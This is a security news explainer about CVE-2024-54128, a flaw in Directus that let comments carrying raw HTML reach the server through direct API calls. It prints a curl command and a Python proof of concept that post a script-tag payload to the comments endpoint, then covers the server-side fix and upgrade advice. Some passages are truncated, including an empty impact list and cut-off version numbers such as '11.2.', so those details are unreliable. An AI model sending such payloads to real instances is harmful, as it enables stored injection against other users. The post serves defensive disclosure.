CVE CyberSecurity Database News

CVE-2024-54128 - Directus Comment Feature HTML Injection Vulnerability Explained

Poster -

Directus is a popular open-source toolkit that gives teams a user-friendly dashboard and API to manage SQL database content. One handy feature in Directus is "Comments"—it lets users add notes or feedback directly related to database items. But in 2024, researchers found and reported a serious vulnerability (CVE-2024-54128) in how comments were handled. Let’s break down what happened, why it matters, and how you can protect your app.

What Is CVE-2024-54128?

CVE-2024-54128 refers to a flaw in certain versions of Directus that allowed attackers to inject HTML code into comments. This could be abused to run malicious scripts, deface the interface, or steal information via HTML Injection (and possibly cross-site scripting/XSS).

Technical Details

When users added or edited comments through the Directus web interface, the app tried to block certain dangerous inputs. For example, inserting HTML tags like <script> or <img> should not be allowed in most text fields.

The Problem:
Directus only enforced this check on the client side (in the browser using JavaScript). Attackers could use direct HTTP requests (bypassing the web app) to add comments with HTML tags. Since the server never performed its own check, these dangerous inputs landed right in the database—and sometimes, right on other users’ screens.

When you add a comment using the regular Directus dashboard, and you try to type code

<script>alert('hacked');</script>

The browser-side filter stops you and says: "No HTML tags allowed!"

But, if you use a tool like curl or Postman to send data directly to the API, it goes like this

curl -X POST https://your-directus-instance.com/items/comments \
-H "Authorization: Bearer <your_token>" \
-H "Content-Type: application/json" \
-d '{"content":"<h1>This is <b>HTML</b>!</h1>"}'

Result:
The server stores this raw HTML in the database, without complaints.

3. Impact

Any admin or user viewing comments could see injected HTML rendered as-is. If an image, link, or even JavaScript made it into a comment, this could:

Here's some Python code for demonstrating the problem

import requests

API_URL = "https://your-directus-instance.com/items/comments"
TOKEN = "YOUR_AUTH_TOKEN"

payload = {
    "content": "<script>alert('CVE-2024-54128')</script>"
}

headers = {
    "Authorization": f"Bearer {TOKEN}",
    "Content-Type": "application/json"
}

response = requests.post(API_URL, json=payload, headers=headers)
print(response.status_code, response.text)

Don't use this on production! This is for educational and defensive security understanding only.

How Was CVE-2024-54128 Fixed?

The fix, released in Directus 10.13.4 and 11.2., added server-side validation:

- The backend now double-checks any comment content, stripping or rejecting HTML and dangerous tags before storing comments in the database.

Even direct API calls cannot sneak in bad content any more.

What to do:
* Update now! If you use Directus, upgrade to at least version 10.13.4 or 11.2..
* If you can’t update immediately, use a Web Application Firewall (WAF) to block HTML tags in API requests as a temporary solution.

References and More Reading

- Directus GitHub Release 10.13.4
- Directus GitHub Release 11.2.
- NVD - CVE-2024-54128 (pending official entry)
- Directus Security Docs

It allowed attackers to inject HTML by bypassing browser checks.

- Upgrade your Directus to 10.13.4/11.2. or newer to stay safe.

Keep your open-source tools up to date and always validate input on the server, not just the browser!

Timeline

Published on: 12/05/2024 17:15:15 UTC
Last modified on: 12/05/2024 19:15:08 UTC